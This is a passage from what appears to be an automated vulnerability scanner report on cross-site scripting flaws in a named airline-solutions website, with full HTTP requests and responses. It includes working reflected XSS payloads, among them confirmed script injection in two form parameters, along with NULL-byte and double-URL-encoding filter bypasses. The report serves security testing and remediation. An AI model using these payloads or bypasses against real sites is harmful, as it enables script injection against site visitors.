Last-Modified: Tue, 05 Oct 2010 17:10:13 GMT
Pragma: no-cache
Content-Length: 7106
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/copyright_and_trademark/?%007b237"><a>8a1a1739deb=1">
...[SNIP]...

3.4. http://www.sabreairlinesolutions.com/home/about/executive_team/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/executive_team/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d1445"><a>c4609654fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1445"><a>c4609654fa0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/executive_team/?%00d1445"><a>c4609654fa0=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:48:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318891; expires=Wed, 05-Oct-2011 17:48:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fexecutive_team%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:48:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8501


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/about/executive_team/?%00d1445"><a>c4609654fa0=1">
...[SNIP]...

3.5. http://www.sabreairlinesolutions.com/home/about/executive_team/stephen_m._clampett [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/executive_team/stephen_m._clampett

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd77e%2522%253e%253ca%253e0808e0e2c85 was submitted in the REST URL parameter 4. This input was echoed as bd77e"><a>0808e0e2c85 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /home/about/executive_team/stephen_m._clampettbd77e%2522%253e%253ca%253e0808e0e2c85 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321284; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321284; expires=Thu, 06-Oct-2011 01:28:07 GMT; path=/
Set-Cookie: exp_last_activity=1286346487; expires=Thu, 06-Oct-2011 01:28:07 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:28:14 GMT
Pragma: no-cache
Content-Length: 6368
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<body id="stephen_m._clampettbd77e"><a>0808e0e2c85">
...[SNIP]...

3.6. http://www.sabreairlinesolutions.com/home/about/media_press/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/media_press/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0049524"><a>16b0673047b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49524"><a>16b0673047b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/media_press/?%0049524"><a>16b0673047b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:49:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318943; expires=Wed, 05-Oct-2011 17:49:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:49:12 GMT
Pragma: no-cache
Content-Length: 6981
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/media_press/?%0049524"><a>16b0673047b=1">
...[SNIP]...

3.7. http://www.sabreairlinesolutions.com/home/about/privacy_policy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/privacy_policy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb01d"><a>04cb2f1cd5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb01d"><a>04cb2f1cd5a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/privacy_policy/?%00eb01d"><a>04cb2f1cd5a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:00:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316031; expires=Wed, 05-Oct-2011 17:00:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:00:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/privacy_policy/?%00eb01d"><a>04cb2f1cd5a=1">
...[SNIP]...

3.8. http://www.sabreairlinesolutions.com/home/about/sitemap/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/sitemap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0080478"><a>1c4558ae88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80478"><a>1c4558ae88c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/sitemap/?%0080478"><a>1c4558ae88c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:02:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316171; expires=Wed, 05-Oct-2011 17:02:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:03:17 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/about/sitemap/?%0080478"><a>1c4558ae88c=1">
...[SNIP]...

3.9. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/the_as_advantage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b4ab8"><a>1b259e8819c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4ab8"><a>1b259e8819c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/the_as_advantage/?%00b4ab8"><a>1b259e8819c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:44:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318660; expires=Wed, 05-Oct-2011 17:44:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:44:34 GMT
Pragma: no-cache
Content-Length: 7853
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/the_as_advantage/?%00b4ab8"><a>1b259e8819c=1">
...[SNIP]...

3.10. http://www.sabreairlinesolutions.com/home/ascend [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c967d"><a>94f7e2076ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c967d"><a>94f7e2076ed in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend?%00c967d"><a>94f7e2076ed=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:05:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316325; expires=Wed, 05-Oct-2011 17:05:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:05:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19162


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend?%00c967d"><a>94f7e2076ed=1">
...[SNIP]...

3.11. http://www.sabreairlinesolutions.com/home/ascend [search_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend

Issue detail

The value of the search_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff5"><script>alert(1)</script>609319ef91e was submitted in the search_term parameter. This input was echoed as 3eff5\"><script>alert(1)</script>609319ef91e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /home/ascend HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sabreairlinesolutions.com/home/ascend
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabreairlinesolutions.com
Pragma: no-cache
Cookie: exp_last_visit=1286313086; exp_last_activity=1286323079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; __utmb=178985382.2.10.1286304597; __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utmc=178985382
Content-Length: 28

sort_term=issue&search_term=3eff5"><script>alert(1)</script>609319ef91e

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 22:58:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Wed, 05-Oct-2011 22:58:02 GMT; path=/
Set-Cookie: exp_last_activity=1286337482; expires=Wed, 05-Oct-2011 22:58:02 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 22:58:03 GMT
Pragma: no-cache
Content-Length: 7974
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="search_term" id="search_term" value="3eff5\"><script>alert(1)</script>609319ef91e" />
...[SNIP]...

3.12. http://www.sabreairlinesolutions.com/home/ascend [sort_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend

Issue detail

The value of the sort_term request parameter is copied into the HTML document as plain text between tags. The payload 81919<script>alert(1)</script>0c53ea14b3b was submitted in the sort_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /home/ascend HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sabreairlinesolutions.com/home/ascend
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabreairlinesolutions.com
Pragma: no-cache
Cookie: exp_last_visit=1286313086; exp_last_activity=1286323079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; __utmb=178985382.2.10.1286304597; __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utmc=178985382
Content-Length: 28

sort_term=issue81919<script>alert(1)</script>0c53ea14b3b&search_term=

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 22:57:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Wed, 05-Oct-2011 22:57:19 GMT; path=/
Set-Cookie: exp_last_activity=1286337439; expires=Wed, 05-Oct-2011 22:57:19 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 22:57:20 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<h3>Issue81919<script>alert(1)</script>0c53ea14b3b</h3>
...[SNIP]...

3.13. http://www.sabreairlinesolutions.com/home/ascend/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b1c03"><a>05b671b0eb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1c03"><a>05b671b0eb5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/?%00b1c03"><a>05b671b0eb5=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321370; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:31:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321370; expires=Thu, 06-Oct-2011 09:31:29 GMT; path=/
Set-Cookie: exp_last_activity=1286375489; expires=Thu, 06-Oct-2011 09:31:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:31:45 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19196


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/?%00b1c03"><a>05b671b0eb5=1">
...[SNIP]...

3.14. http://www.sabreairlinesolutions.com/home/ascend/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00fe06e<a>db887c7418b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe06e<a>db887c7418b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/?%00fe06e<a>db887c7418b=1 HTTP/1.1
